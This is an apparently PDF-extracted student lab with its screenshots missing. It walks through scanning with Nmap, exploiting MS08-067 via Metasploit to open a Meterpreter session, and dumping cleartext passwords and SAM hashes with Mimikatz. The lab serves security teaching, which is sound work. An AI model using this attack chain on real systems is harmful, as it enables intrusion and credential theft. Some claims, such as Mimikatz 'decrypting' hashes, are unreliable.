Lab+ +Password+Cracking+Using+Mimikatz
Lab+ +Password+Cracking+Using+Mimikatz
Overview
In this lab, the student will learn how to crack cleartext password from a Windows client
using Mimikatz. Mimikatz has become an extremely effective attack tool against Windows
clients, allowing bad actors to retrieve cleartext passwords, as well as password hashes from
memory. This lab will provide an overview of Mimikatz’s capabilities and payload vectors.
Hardware requirements
To begin this lab, we will need an active Meterpreter session between Kali and the victim.
Using the Nmap scripting engine, you can use the vulnerability scan script to check the first
1000 ports for known vulnerabilities.
My victims network IP range is 192.168.145.0/24 Yours may differ. I Got the range from doing
an IFCONFIG form my Kali terminal. I took the first three octets of my IP address assigned to
my Kali machine, and that is my network IP. By giving the last (4th) octet a value of zero
followed by the CIDR notation of /24, I am telling Nmap to scan all 255 IP address possible for
this network.
I’m treating this as if I am looking for a victim. From my scan results, I see that there is a
machine that is vulnerable to the ms08_067_netapi exploit.
1
I’ve gotten enough information from the results, but I can still drill into this machine and
identify specifically what the machines’ operating system and service pack are.
From my first scan, I learned that a machine, 192.168.145.129; was vulnerable using an SMB
exploit running on port 445. I scanned for the operating system information using another Nmap
script specifically targeting port 445 for the operating system information.
2
The first thing we need to do is get a Meterpreter session going. We have identified our victim
is having an SMB vulnerability using port 445 and Nmap has told us, the vulnerability is
identified as ms08_067_netapi. We now must search Metasploit for an exploit that can take
advantage of the vulnerability.
We see that there is an exploit we can use, with use being the optimal word. Highlight just the
name of the exploit in the search results. At the msf prompt, type the word use followed by one
single space. Place your cursor in the terminal window and right click and select paste.
3
At the prompt type: options
For me, this command looks like this: set RHOST 192.168.145.129
(This is my victim’s IP address, not yours! Yours will differ)
4
We can check the version by typing: mimikatz_command -f version
We can use the help mimikatz command to see what hash credentials we can retrieve in clear
text. We’ll retrieve the passwords for two sets of credentials later in the lab.
We can get a complete list of the available modules by trying to load a non-existent feature.
5
Reading Hashes and Passwords from Memory
All passwords stored on a Windows machine are stored using a hash value. Mimikatz takes the
hash and decrypts it.
We can see both cleartext and hashed passwords with the Mimikatz tool.
With the Kerberos command, we see the cleartext of the administrator password. Remember,
this is being pulled from memory.
6
The most common use for Mimikatz is to dump the hashes from the SAM file. The Security
Account Manager (SAM), often called the Security Accounts Manager, is a database file in
Windows XP, Windows Vista, and Windows 7 that stores users' passwords. It can be used to
authenticate local and remote users. Beginning with Windows 2000 SP4, Active Directory
authenticates remote users.
We can now need to use the power of mimikatz to decrypt the hashed password seen in the
SAM file.
7
End of the lab!